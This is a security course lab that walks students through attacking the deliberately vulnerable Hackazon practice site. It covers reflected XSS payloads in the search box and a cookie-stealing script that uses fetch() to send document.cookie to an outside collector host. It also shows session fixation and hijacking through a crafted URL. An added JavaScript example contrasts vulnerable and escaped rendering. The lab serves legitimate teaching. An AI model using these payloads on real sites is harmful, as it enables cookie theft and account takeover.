W 230: Manual Audit of Hackazon (20 pts)

What You Need

Purpose

To practice finding and exploiting several common Web vulnerabilities. I am following the "Hacking Hackazon" blog post listed under Sources below.

1. Reflected XSS in Search Function

User Input Handling

In Firefox, go to

https://hackazons.samsclass.info/

Search for

shoes

No results are found, but the query "shoes" appears in the results page, as shown below.

When data from the user is echoed back into a Web page without being sanitized or encoded, it can carry HTML markup and scripts, producing a reflected XSS vulnerability.

Simple Proof-of-Concept

To test for that, search for
shoes<script>alert(1);</script>
An alert box pops up, as shown below.

Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.

Revealing a Cookie

Search for
shoes<script>alert(document.cookie);</script>
An alert box pops up, showing cookie values, as shown below.

Viewing a Product

In the Hackazon page, click OK to close the pop-up box.

At the top left, click the red HACKAZON logo to return to the home page.

Click a product to view it, as shown below.

Flag W 230.1: Stealing Cookies (10 pts)

In the Hackazon page, search for
<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>

In a browser, go to this page, which records the data it receives:

https://attack32.samsclass.info/tmp/data.txt

Your stolen cookie appears at the end of the list. This works because document.cookie only exposes cookies that lack the HttpOnly attribute; Hackazon's PHPSESSID cookie lacks it, so script injected into the page can read and exfiltrate it.

The flag is covered by a green box in the image below.
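As an added example, not code from Hackazon or from the blog post this page follows, here is a JavaScript model of what the search steps above exercise: a results page that reflects the query verbatim (vulnerable), the same page with the query HTML-escaped (hardened), and the construction of the link an attacker would send carrying the cookie-stealing payload from the flag step. The base URL is the one used above; the query-parameter name `q`, the helper names and the HTML template are assumptions, since this page does not show Hackazon's actual search code.

```javascript
// Added example, not Hackazon's own code. Models why the search page above
// is vulnerable to reflected XSS and what the fix looks like.
// Assumptions: the query parameter is named "q" (Hackazon's real parameter
// name is not given on this page) and the HTML template is invented.

const HACKAZON = 'https://hackazons.samsclass.info';

// The cookie-stealing payload from the "Flag W 230.1" step above.
const COOKIE_THIEF =
  '<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>';

// Vulnerable rendering: the query is concatenated into the page as-is, so
// markup in it is parsed and a <script> tag runs in the visitor's browser.
function renderResultsVulnerable(query) {
  return `<h2>Search results for "${query}"</h2><p>No results found.</p>`;
}

// HTML-escape the five characters that can change the meaning of markup
// in an HTML text node or a double-quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: the query is escaped before it reaches the page body,
// so the browser displays the payload as text instead of executing it.
function renderResultsSafe(query) {
  return `<h2>Search results for "${escapeHtml(query)}"</h2><p>No results found.</p>`;
}

// The link an attacker mails to a victim. encodeURIComponent keeps the payload
// intact inside the URL; the server URL-decodes it before reflecting it.
function buildAttackUrl(payload) {
  return `${HACKAZON}/search?q=${encodeURIComponent(payload)}`;
}

// What the server sees after decoding the query parameter.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q');
}

// True if the page contains a real <script> tag the browser would execute
// (an escaped "&lt;script&gt;" does not match).
function hasLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// Walk-through: the decoded payload reaches both renderers; only the
// vulnerable one produces a page with an executable script tag.
function demo() {
  const query = queryFromUrl(buildAttackUrl(COOKIE_THIEF));
  return {
    vulnerable: hasLiveScript(renderResultsVulnerable(query)),
    hardened: hasLiveScript(renderResultsSafe(query)),
  };
}

console.log(demo());
```

Two caveats a practitioner would add: the escaping above is correct for an HTML text node and double-quoted attributes, but a query reflected inside a `<script>` block, a URL, or CSS needs encoding for that context instead; and marking PHPSESSID as HttpOnly would stop this particular payload from reading the cookie but would not fix the XSS itself, which could still act on the victim's behalf from inside the page.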

2. Session Fixation

Making a Test Account

In the Hackazon page, at the top right, click "Sign Up".

Click the "New User?" button.

Fill in the form to create an account with any username and password you can remember. Click Register.

At the top right, click Logout.

Opening the Web Console

In Firefox, at the top right, click the three-bar "hamburger" icon, point to "Web Developer", and click "Web Console".

A command line appears at the bottom of the screen, with a >> prompt.

Viewing Cookies

In the Web Console, execute this command:
console.log(document.cookie)
The PHPSESSID value appears, as shown below.

Logging In

In Firefox, in the Hackazon page, at the top right, click "Sign In".

Sign in with the username and password you chose earlier.

In the Web Console, execute this command:

console.log(document.cookie)
As shown below, the cookie value is the same as it was before you logged in.

This is session fixation: the server keeps the same PHPSESSID for the session before and after authentication instead of issuing a new ID at login. Combined with the XSS vulnerability, which lets an attacker set a cookie of their choosing in the victim's browser, it allows account takeover, as we'll do below.

Changing a Cookie's Value

In the Web Console, execute these commands:
document.cookie = "PHPSESSID=123"
console.log(document.cookie)
The PHPSESSID value changes to "123", as shown below.

Refreshing the Hackazon Page

In Firefox, at the top left, click the curved-arrow icon to refresh the page.

You see a login page, as shown below. Changing the PHPSESSID value made Hackazon forget who you were.

Logging In

Log in to Hackazon again, with the username and password you chose earlier.

In the Web Console, execute this command:

console.log(document.cookie)
Notice that the cookie value is still "123". The server adopted the session ID we chose instead of rejecting it and issuing its own, so we can fix any session ID value we like and the server will use it.

Crafting a Malicious URL

In Hackazon, execute this search:
<script>document.cookie="PHPSESSID=555"</script>
In Firefox, copy the URL from the address bar, as shown below.

In the Web Console, execute this command:

console.log(document.cookie)
The PHPSESSID value is now 555, as shown below.

Refreshing the Hackazon Page

In Firefox, at the top left, click the curved-arrow icon to refresh the page.

The top right now shows "Sign In/Sign Up", indicating that you are now logged out, as shown below.

Social Engineering

Now imagine you are sending this URL to a target individual via email. To simulate that, open a different browser, such as Chrome.

Paste in the URL you just copied.

Chrome shows a Hackazon page, as shown below.

In Chrome, at the top right, click "Sign In".

Sign in with the username and password you chose earlier.

Opening the Hackazon Home Page in Firefox

In Firefox, at the top left, click the Hackazon logo. You are now logged in, as shown below. You have hijacked the session of the Chrome user!

Flag W 230.2: Fixed Cookie (10 pts)

In Firefox, in the Web Console, execute this command:
console.log(document.cookie)
The flag is the PHPSESSID value, covered by a green box in the image below.

Sources

Hacking Hackazon

Posted 2-6-2020
Second task added 6-13-2020